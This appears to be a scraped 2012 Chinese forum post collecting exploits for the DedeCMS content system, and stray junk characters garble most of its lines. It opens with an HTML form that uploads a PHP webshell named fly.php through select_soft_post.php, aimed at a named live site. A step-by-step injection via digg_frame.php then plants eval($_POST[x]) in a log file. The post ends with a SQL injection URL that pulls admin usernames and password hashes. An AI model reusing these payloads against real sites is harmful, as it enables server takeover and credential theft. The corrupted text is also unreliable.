- T/ g6 @) M% l% g3 N. X<head>6 D' f, ~/ y2 g$ a
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
5 d- {3 ^4 ?- J9 Q) r9 k, ?2 ?</head>* l( M/ ~" Y& U0 i% m; a/ G
<body style="FONT-SIZE: 9pt">" M! k; {( x" I' W a8 F4 Y# c* \7 I
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />$ Q" W6 t6 N5 G3 D+ h
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
* b5 l. U E* |; b! w4 Q" y! J( j, j<input type='hidden' name='activepath' value='/data/cache/' />4 F6 _& V# s, M3 i* T
<input type='hidden' name='cfg_basedir' value='../../' />/ x: o; R* a1 J
<input type='hidden' name='cfg_imgtype' value='php' />6 e; Y- M/ M& I B/ m3 e7 r
<input type='hidden' name='cfg_not_allowall' value='txt' />6 O2 j5 N9 z7 d6 L
<input type='hidden' name='cfg_softtype' value='php' />5 r- H; _# W6 Z+ i6 F1 ~
<input type='hidden' name='cfg_mediatype' value='php' />
- ^) B/ g7 O0 k% _<input type='hidden' name='f' value='form1.enclosure' />1 {) ]$ y: w9 ?7 i) K
<input type='hidden' name='job' value='upload' />0 s) F. K# D$ _7 e0 D2 \2 Y
<input type='hidden' name='newname' value='fly.php' />
% I7 Q4 F+ D! E4 s" q6 w3 x& K+ XSelect U Shell <input type='file' name='uploadfile' size='25' />
# T% e! q w4 u4 R2 g<input type='submit' name='sb1' value='确定' />
6 C0 E. ^% t4 ?' }" q</form>
3 i& @& d, Y5 P$ K) Q& V<br />It's just a exp for the bug of Dedecms V55...<br />
6 ~$ N, i: g& U0 ] ?Need register_globals = on...<br />6 d# x3 _$ N1 M J2 M# P5 m
Fun the game,get a webshell at /data/cache/fly.php...<br />3 H6 y! ^" O8 Z$ d' `
</body>! R+ _4 n/ Q( m+ E/ Z
</html>
/ r" E4 X5 w/ r+ z
' H$ |* }0 _1 D! R6 H$ q: H+ m* f. m) N% E: G$ W0 V* Z& N8 n o- U
. V( W' Q3 z) {' n
3 w3 l; y' L8 d! ~( j5 T: A `1 z- ]! F
: v* c* ?8 T8 H+ c, N5 d# G( K
6 } W% E( u, m* d/ P" _; d3 |
7 A/ Q+ ?0 w" |1 w, S* u6 z) N; _! q l( {) @
/ Z; @6 n/ F S
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞4 k7 q: I* r; V/ s3 N0 U" l: _
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
$ m: I: l! Y& o& g1. 访问网址:
6 {. W# \. o6 H+ Q. A' W* a) \- `http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
7 C. X% B; u5 N可看见错误信息
6 T4 h# L; b& W: H
# X' Z$ `7 q ^8 I5 y' Y& _( p4 G. R" V* L# b9 C9 ?3 g" t
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。' V$ r, w$ @# _, a E- E! w: X
int(3) Error: Illegal double '1024e1024' value found during parsing1 [- o: b3 v; M8 Y. }7 X) f( ?
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>. T" D7 T- k3 L( k! V1 y7 P5 F$ x
3 ?% l7 M q3 K% m1 @
) s: R" T2 }' c
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是' D/ [3 S+ M, M6 U" O( h4 G
z, V# }7 V! e V, b) t
4 ?) c2 L: B% ]% M/ O' j
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>% ?4 m, f& b; `$ P9 [
( Q9 n5 N$ D; _# r3 n& X
0 U- n4 {$ i$ z: j按确定后的看到第2步骤的信息表示文件木马上传成功.+ K/ b" {' |: k \
8 d; v3 |7 I4 f* f: F8 M& h& e
0 M) x% Q# q; j
7 P d* X0 q9 w- [! Z
+ J. A; D. l4 B3 s& z- d& l% O: i! K, |/ a D1 p% H$ p( ?
u: m6 S9 ~2 H) E- P, H
3 n; l0 {0 ~, C m2 n; z4 U$ Z9 P4 v' f0 G
' S1 g1 _! H+ i% u$ C4 J+ {+ q, c
( n7 O+ L9 V2 x. O
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
% p3 D0 Z: R% [, ehttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对